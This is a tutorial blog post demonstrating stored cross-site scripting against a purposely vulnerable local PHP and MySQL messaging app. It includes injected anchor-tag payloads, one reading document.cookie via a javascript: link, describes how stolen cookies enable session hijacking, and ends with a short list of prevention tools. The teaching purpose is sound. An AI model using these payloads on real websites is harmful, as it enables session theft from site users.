This is the second part of the blog post "Reflected Cross Site Scripting(XSS) with examples". Stored XSS is the next way of performing XSS attack on a website. As the name implies itself there is a database in here and the user inputs will be stored in this database. An attacker will try to use an non sanitized textbox or text area to do the attack.
Now let's see how stored XSS works with an example. For this you have to have mySql database.
All the necessary files are uploaded to Github.
https://github.com/sajith01prasad/Stored-Cross-Site-Scripting-with-examples
First create a database called xss. inside this database create a table called 'Messages'. Messages table has two columns ( Receiver and Message). Use varchar as the data type for both columns.
Now go to MessageClient.html page
By clicking on the first link sender can send messages to anyone he likes. Click on the first link.
Send a message To : Sam
Message: Hello Sam. How are you doing?
Now go to phpMyAdmin. Go into the 'xss' database. You have "Messages" table in the database. click on it.
You can see the Message we sent to Sam is stored in the database.
How an attacker use this to perform Stored XSS attack ? We will discuss about that now.
As you know there are two hyperlinks in the "message client" homepage. We used first link to send a message. Now let's click on the second link which is "sent Messages". Once you click on it you will be directed to a page like this.
Here, enter "Sam" and hit "view".
A simple sql query is written to retrieve all the messages that are sent to a given person. Now let's see what will happen when an attacker inputs something like this ; in the first page.
Receiver - Neville
Message - <a href=\"\/\/google.com\">Click me</a>
Now go to the second link and type Neville.
You can see a hyperlink "Click me" on the web page. Click on it. Legitimate user will be directed to Google home page.
An attacker can use this method to direct all the users in a website to his malicious website so he can steal everyone's cookies etc.
I will show you how to view the cookie values when the user clicks on Click me hyperlink.
For this also we have follow the same procedure. First we should enter the script in to the database and when that script retrieves by the web page and user clicks on it , it will get execute.
Receiver -Kevin
Message - <a HREF="javascript:alert(document.cookie);">Click me</a>
Now go to mysql and check whether the inputs are there or not.
Then go to the second link of the main page where you can view sent messages.
In there give "Kevin" as the receiver's name.
Like in the previous example you will see a hyperlink on the web page(Click me). Click on that link.
Since the website I am hosting on localhost does not maintain a session and it does not store any cookie value on the web browser I had to add a php code line to the initial code.
setcookie("localhost","237637276377",false,"/",false);
localhost is the name of the cookie.
237637276377 is the value of the cookie.
/ is the path of the cookie.
The third parameter I mentioned in here is the secure flag. I set the parameter to false because if it is true cookie will be set only if it gets transmitted through a secured connection like HTTPS. Since localhost serves on https I set the flag to FALSE.
Last parameter is the http only flag. We are going to access this cookie from the client end using javascript. If we set the flag to TRUE this cookie will be only accessible from the server side. So there will be now way for me to show you how to retrieve the cookie value. Therefore I set the flag to FALSE.
viewMessages.php
What if an attacker get these cookie values and send them to his malicious website to store them? Then he can use them to log in to the website as legitimate users before cookies get expired.
The best place in a website to practice this XSS attack is the comment section. If the comment section is not validated properly every user in the website is in danger. These comment sections are written in a way that it gets refreshed in every certain time period. The attacker can use this feature to improve the strength of the attack.
How to prevent Stored XSS
- Escaping special characters.
- Open source libraries.
- PHP AntiXSS
- xss_clean.php filter
- HTML Purifier
- xssproject
- XSS HTML Filter
No comments:
Post a Comment